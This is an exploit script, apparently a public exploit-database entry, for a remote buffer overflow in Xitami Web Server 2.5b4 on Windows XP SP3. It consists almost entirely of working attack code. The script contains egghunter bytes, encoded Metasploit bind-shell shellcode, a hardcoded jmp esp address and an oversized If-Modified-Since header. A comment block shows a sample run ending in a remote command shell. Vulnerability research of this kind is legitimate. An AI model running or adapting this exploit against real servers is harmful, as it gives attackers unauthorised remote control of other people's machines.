# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (Egghunter)
# Date: June 4, 2011
# Author: Glafkos Charalambous
# Version: 2.5b4
# Tested on: Windows XP SP3 En
# Discovered by: Krystian Kloskowski
#
# root@bt:~/Desktop# python xitami.py 192.168.0.24 80
# [+] Connected
# [+] Sending payload...
# [+] Check Port 1337 for your shell
# root@bt:~/Desktop# telnet 192.168.0.24 1337
# Trying 192.168.0.24...
# Connected to 192.168.0.24.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Xitami>ipconfig
# ipconfig
#
# Windows IP Configuration
#
#
# Ethernet adapter Local Area Connection:
#
#        Connection-specific DNS Suffix  . : 
#        IP Address. . . . . . . . . . . . : 192.168.0.24
#        Subnet Mask . . . . . . . . . . . : 255.255.255.0
#        Default Gateway . . . . . . . . . : 192.168.0.1
#
# C:\Xitami>

import time
import socket
import sys

if len(sys.argv) != 3:
    print "Usage: ./xitami.py <Target IP> <Target Port>"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

egghunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02"
"\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"w00t" # 4 byte tag
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# ./msfpayload windows/shell_bind_tcp lport=1337 exitfunc=process R | ./msfencode -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -c 7 -t c
shellcode = ("\xba\xa2\xcf\xad\x8d\xdb\xd1\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x7e\x83\xee\xfc\x31\x56\x11\x03\x56\x11\xe2\x57\x70\xe4\x08"
"\x09\x2d\x2e\xd1\xec\x46\xf5\x22\x56\x96\x3c\x7b\x1e\x5b\x7e"
"\x78\xef\x23\x71\x82\x3e\x5f\xf1\xd3\x58\x3b\x53\x30\xe6\xbc"
"\x82\xb3\xba\xf5\xdf\x9e\x21\x78\xcd\x8d\x25\x87\x5b\xd4\xfd"
"\x6c\xcd\xcf\x7b\x68\x84\x3d\x07\xcb\x1e\x1b\x06\x11\x31\xfd"
"\x90\x27\xff\xe6\x22\x4d\xdd\x1a\xc9\xe1\x93\x45\x4b\x13\x48"
"\x74\xcc\x45\x07\x95\xd1\x38\xde\xa3\xef\x7d\x68\xb0\xd1\x67"
"\x60\xe5\x89\xb5\xf7\x3e\x2f\x49\xd7\xb8\xc0\xc6\x1b\xfc\xe2"
"\xbb\xc8\xae\x39\x78\x81\x4d\xc4\x1c\x2d\x16\x6d\xc3\x04\xde"
"\x58\x43\x4e\xc5\x60\x46\x4b\xc9\x79\xfb\x32\xdd\x46\xb8\xd4"
"\x61\x62\x92\xf6\xe8\x7b\xe8\x41\xc0\xee\xe2\xbb\x64\x6c\xb8"
"\x43\x2d\xfd\xda\x61\xb0\x7c\xe6\x36\xab\x3e\x7a\x80\xe6\x60"
"\x2b\x52\x1d\x53\xed\xb4\x94\x86\x8b\x66\x26\x56\x67\xe0\x7c"
"\xfb\x1c\xb9\x4f\x75\x4e\x7d\x63\xac\xbc\x7e\x90\xfd\xa1\xb2"
"\x6b\x06\xb4\x92\x1f\x90\x26\x1a\x4f\x3d\x18\xa2\x3c\x72\x0f"
"\x93\x37\xf7\xf3\x5a\x7f\x33\xbf\x9f\xc2\xea\xb9\x13\x6c\x77"
"\xb6\xd4\xc0\x37\x86\x78\xd3\x86\x8c\x9f\x3a\x0f\xb1\x5e\x0f"
"\xb9\x09\xf1\x0c\xe9\x2f\xb7\xd7\xea\x37\x4f\x6a\xc3\xdb\x7b"
"\x48\x32\x05\xd4\x48\xcc\x47\x59\x41\xc5\x0b\xf5\x02\xeb\x06"
"\x7f\xae\x25\x2b\x16\x2d\x51\x18\x91\x9c\x96\x32\x17\x1c\x6e"
"\x95\xb9\x4e\xf5\xa6\x29\x8b\x30\x48\x07\x55\xf1\xe4\xa8\xe2"
"\x4d\xe0\x6a\xef\xd3\x4e\x07\x4d\xb2\x25\xe0\xb2\x33\x1b\xdc"
"\x50\xac\x59\x35\xd9\x91\x9c\x44\x5a\xc1\x52\x19\x0f\x03\xc9"
"\x1d\x71\xe5\x79\x54\x3d\xc0\x87\x4d\x9f\x9d\x69\x09\xd4\x6b"
"\xe2\xa5\xe0\x77\xd0\xb9\xbd\x85\xd0\x35\xcb\x59\x78\x22\xf2"
"\x25\x78\x64\xf6\x2a\x8d\x3e\xc8\xce\x7c\x6f\x64\x24\xb4\x2c"
"\x14\xd5\xff\x9c\x84\x40\xf1\x74\xcf\x3c\x4f\xac\x2c\xe2\xae"
"\xaa\xaf\xb0\xcf\xc8\x31\x30\xb3\xb0\x8b\x08\x25\x2d\x95\x3d"
"\xf5\x0c\x1f\x23\xd9\x87\x31\x79\xd2\x8d\xad\x59\xdd\xb0\x4c"
"\xa4\x17\xeb\x97\xb0\x90\x3c\x45\xb7\x3f\x2b\x04\xf3\xc6\xe8"
"\x56\x25\x7a\xfd\x6e\x3b\xef\x64\x14\x9b\x67\x08\x9c\x47\x73"
"\x24\x1e\x1e\xc6\xd2\xad\xcc\x0c\xc8\xbb\x4e\x12\xde\xf5\x35"
"\x25\xe0\xb0\xef\x04\xb5\x29\x62\xc6\x56\x44\x52\x16\xa3\x63"
"\x63\xcd\xd1\xc9\x45\x87\x3b\xd6\x4b\x7a\x24\xd5\xd4\x7d\x4c"
"\x83\x06\x16\x88\x7f")

jump = "\xeb\x22" # short jump

buf = "A" * 72                  
buf += "\xD7\x30\x9D\x7C" # jmp esp (user32.dll) / XP SP3 English
buf += jump
buf += "\x90" * 50
buf += egghunt
buf += "w00tw00t" # tag
buf += shellcode

header = (
'GET / HTTP/1.1\r\n'
'Host: %s\r\n'
'If-Modified-Since: pwned, %s\r\n'
'\r\n') % (target, buf)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
    print "[+] Connected"
except:
    print "[!] Connection Failed"
    sys.exit(0)

print "[+] Sending payload..."
s.send(header)
time.sleep(1)
s.close()

print "[+] Check port 1337 for your shell"

